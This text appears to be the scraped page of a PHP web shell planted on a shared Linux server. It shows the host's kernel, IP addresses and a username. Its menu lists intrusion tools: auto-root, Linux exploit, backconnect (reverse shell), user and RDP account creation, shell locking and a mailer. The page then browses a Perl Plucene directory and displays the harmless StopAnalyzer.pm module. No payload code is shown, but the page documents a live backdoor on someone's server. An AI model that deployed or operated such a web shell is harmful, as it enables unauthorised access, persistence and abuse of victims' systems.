Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
Plucene /
Analysis /
[ HOME SHELL ]
Name
Size
Permission
Action
Standard
[ DIR ]
drwxr-xr-x
Analyzer.pm
864
B
-rw-r--r--
CharTokenizer.pm
1.58
KB
-rw-r--r--
LetterTokenizer.pm
532
B
-rw-r--r--
LowerCaseFilter.pm
627
B
-rw-r--r--
LowerCaseTokenizer.pm
421
B
-rw-r--r--
PorterStemFilter.pm
1.72
KB
-rw-r--r--
SimpleAnalyzer.pm
799
B
-rw-r--r--
StopAnalyzer.pm
1.09
KB
-rw-r--r--
StopFilter.pm
934
B
-rw-r--r--
Token.pm
1.21
KB
-rw-r--r--
TokenFilter.pm
548
B
-rw-r--r--
Tokenizer.pm
851
B
-rw-r--r--
WhitespaceAnalyzer.pm
795
B
-rw-r--r--
WhitespaceTokenizer.pm
462
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : StopAnalyzer.pm
package Plucene::Analysis::StopAnalyzer; =head1 NAME Plucene::Analysis::StopAnalyzer - the stop-word analyzer =head1 SYNOPSIS my Plucene::Analysis::StopFilter $sf = Plucene::Analysis::StopAnalyzer->new(@args); =head1 DESCRIPTION Filters LetterTokenizer with LowerCaseFilter and StopFilter. =head1 METHODS =cut use strict; use warnings; use Plucene::Analysis::LowerCaseTokenizer; use Plucene::Analysis::StopFilter; use base 'Plucene::Analysis::Analyzer'; my @stopwords = ( "a", "and", "are", "as", "at", "be", "but", "by", "for", "if", "in", "into", "is", "it", "no", "not", "of", "on", "or", "s", "such", "t", "that", "the", "their", "then", "there", "these", "they", "this", "to", "was", "will", "with" ); =head2 tokenstream my Plucene::Analysis::StopFilter $sf = Plucene::Analysis::StopAnalyzer->new(@args); Filters LowerCaseTokenizer with StopFilter. =cut sub tokenstream { my $self = shift; return Plucene::Analysis::StopFilter->new({ input => Plucene::Analysis::LowerCaseTokenizer->new(@_), stoplist => \@stopwords }); } 1;
Close